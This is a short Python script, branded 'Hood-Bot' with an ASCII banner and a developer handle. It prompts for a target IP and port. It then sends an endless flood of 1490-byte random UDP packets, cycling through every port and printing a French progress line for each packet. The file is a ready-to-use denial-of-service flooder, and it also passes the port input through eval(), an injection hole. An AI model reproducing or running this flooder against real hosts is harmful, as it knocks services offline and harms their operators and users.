import sys
import os
import colorama
import time
import socket
import scapy.all as scapy
import random
import threading

from colorama import *
from datetime import datetime

colorama.init(True)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)

banner = f"""
{Fore.RED}██╗  ██╗ ██████╗  ██████╗ ██████╗       {Fore.BLUE}██████╗  ██████╗ ████████╗
{Fore.RED}██║  ██║██╔═══██╗██╔═══██╗██╔══██╗      {Fore.BLUE}██╔══██╗██╔═══██╗╚══██╔══╝
{Fore.RED}███████║██║   ██║██║   ██║██║  ██║{Fore.GREEN}█████{Fore.MAGENTA}╗{Fore.BLUE}██████╔╝██║   ██║   ██║   
{Fore.RED}██╔══██║██║   ██║██║   ██║██║  ██║{Fore.MAGENTA}╚════╝{Fore.BLUE}██╔══██╗██║   ██║   ██║   
{Fore.RED}██║  ██║╚██████╔╝╚██████╔╝██████╔╝      {Fore.BLUE}██████╔╝╚██████╔╝   ██║ {Fore.RED}   
{Fore.RED}╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═════╝       {Fore.BLUE}╚═════╝  ╚═════╝    ╚═╝ {Fore.BLUE}  dev by ! '±NoX± أنا#3688 """
os.system('cls')

print(f"{banner}")
print()
print()


ip = input(f"{Fore.RED}" + "[" + f"{Fore.WHITE}" + ">" + f"{Fore.RED}" + "]" + f"{Fore.BLUE}" + "I" + f"{Fore.CYAN}" + "P" + f"{Fore.WHITE}" + " :")
port = eval(input(f"{Fore.RED}" + "[" + f"{Fore.WHITE}" + ">" + f"{Fore.RED}" + "]" + f"{Fore.BLUE}" + "Po" + f"{Fore.CYAN}" + "rt" + f"{Fore.WHITE}" + ":"))


sent = 0
while True:
    sock.sendto(bytes, (ip, port))
    sent = sent + 1
    port = port + 1
    print("Packet %s envoyé à %s sur le port : %s\r"%(sent,ip,port))
    if port == 65534:
        port = 1
